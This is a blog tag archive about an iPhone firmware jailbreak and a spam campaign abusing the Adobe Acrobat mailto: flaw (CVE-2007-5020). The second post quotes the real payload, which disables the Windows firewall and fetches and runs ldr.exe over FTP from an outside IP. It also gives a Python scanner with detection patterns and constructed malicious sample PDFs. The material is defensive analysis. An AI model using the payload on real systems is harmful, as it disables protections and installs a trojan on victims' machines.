Tag Archive for 'exploit'

Nov 09

Firmware 1.1.2 for iPhone and iPod touch released and already jailbroken

With the upcoming release of the iPhone in England and Germany, Apple has issued a new firmware (1.1.2) that patches the current jailbreak method based on the TIFF exploit. A twin firmware for the iPod touch was released as well. The new Apple firmware does not seem to introduce new features to the iPhone. However, according to MacRumors, the long-awaited ability to add an event in the calendar was added to the touch.

It seems that the 1.1.2 firmware is already broken and the iPod touch is jailbroken (see the screenshot); read this post to know more. Since the new firmware patches the TIFF exploit (see the Engadget screenshot below), I wonder what exploit is used. Since the jailbreak was so fast, it is likely that the team had the exploit ready for many weeks and kept it secret. Thus my bet is that it works even on the old firmware.

Oct 31

Massive exploitation of the PDF flaw by spam

If you remember, a few weeks ago I wrote a post about a hole in Adobe Acrobat (CVE-2007-5020). It appears that the proof of concept is currently being used to mount a massive attack through spamming: you receive a mail with a PDF that contains the code to exploit the vulnerability. Since the vulnerability is not very old, I wonder how serious it will become. Remember that Slammer or Code Red used very old vulnerabilities (more than 6 months old). Thus many unpatched copies of acroread are probably in the wild.

The current form of the attack is used to install a backdoor. More specifically, it does this (SANS analysis):

obj<</URI(mailto :%/../../../../ ../../Windows /system32/cmd”.exe”” /c /q “@echo off&netsh firewall set opmode mode=disable&echo o 81. 95. 146. 130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&” “&”

In a more understandable form (F-Secure analysis), it means that the exploit disables the Windows Firewall by issuing the following command:

  • netsh firewall set opmode mode=DISABLE

Then it downloads a file from the following FTP site and executes it:

  • ftp://203.121.69.116/[REMOVED].exe

It is detected as Trojan-Downloader.Win32.Small.gkc. Currently, around 32% of the common antivirus products are able to detect it. Sooner or later a new version that directly executes shellcode or worm code will be in the wild, and it will become very nasty because this time it will not be possible to block the backdoor download point with a firewall. In the meantime, better safe than sorry: the IP 203.121.69.116 should be blacklisted in your firewall, even if this box is not reachable anymore. Also remember that even if the backdoor is not installed, this exploit still deactivates the XP firewall and therefore may introduce subsequent problems.
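As an added example (not from the SANS or F-Secure write-ups), here is a small Python heuristic that flags PDFs carrying this kind of mailto: URI target, including one hidden inside a FlateDecode stream that a plain grep on the file would miss. The indicator names and the three sample PDFs are constructed for this post.

```python
"""Heuristic scanner for the mailto: URI abuse described in this post (CVE-2007-5020).
Added example, not SANS/F-Secure tooling: flags /URI targets that use the mailto: scheme
with a %-prefix, path traversal or a cmd.exe invocation, plus the firewall-disabling command."""
import re
import zlib

URI_RE = re.compile(rb"/URI\s*\(([^)]*)\)")          # /URI(...) entries in PDF dictionaries
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)

# Indicators specific to this attack; each is checked against a mailto: target only.
INDICATORS = {
    "percent_trick": re.compile(rb"^mailto\s*:\s*%", re.IGNORECASE),   # "mailto:%" handler trick
    "path_traversal": re.compile(rb"\.\./"),                            # ../../Windows/...
    "cmd_exe": re.compile(rb"cmd\W{0,4}\.exe", re.IGNORECASE),          # also matches cmd".exe"
    "firewall_off": re.compile(rb"netsh\s+firewall\s+set\s+opmode", re.IGNORECASE),
}

def _blobs(pdf_bytes):
    """Yield the raw file plus every stream body that inflates as FlateDecode (zlib)."""
    yield pdf_bytes
    for m in STREAM_RE.finditer(pdf_bytes):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            pass  # not zlib-compressed: the raw pass already covered it

def scan_pdf(pdf_bytes):
    """Return the sorted indicator names found in any mailto: /URI target of the PDF."""
    hits = set()
    for blob in _blobs(pdf_bytes):
        for uri in URI_RE.findall(blob):
            if not uri.lstrip().lower().startswith(b"mailto"):
                continue
            hits.update(name for name, pat in INDICATORS.items() if pat.search(uri))
    return sorted(hits)

# Constructed samples (not real captures); the malicious one keeps only the shape of the
# post's payload: traversal from the mailto: handler into cmd.exe plus the netsh command.
SAMPLE_MALICIOUS = (
    b"%PDF-1.4\n1 0 obj<</Type/Annot/Subtype/Link/A<</S/URI/URI(mailto:%/../../../../"
    b"Windows/system32/cmd\".exe\" /c netsh firewall set opmode mode=disable)>>>>endobj\n"
)
SAMPLE_BENIGN = b"%PDF-1.4\n1 0 obj<</S/URI/URI(mailto:alice@example.com)>>endobj\n"
# Same abusive target hidden in a compressed object stream, which a plain grep would miss.
SAMPLE_COMPRESSED = (
    b"%PDF-1.5\n2 0 obj<</Filter/FlateDecode>>stream\n"
    + zlib.compress(b"<</S/URI/URI(mailto:%/../../../Windows/system32/cmd.exe)>>")
    + b"\nendstream\nendobj\n"
)
```

The URI regex does not handle escaped parentheses inside PDF strings, so treat a hit as a triage signal and confirm with a proper PDF parser.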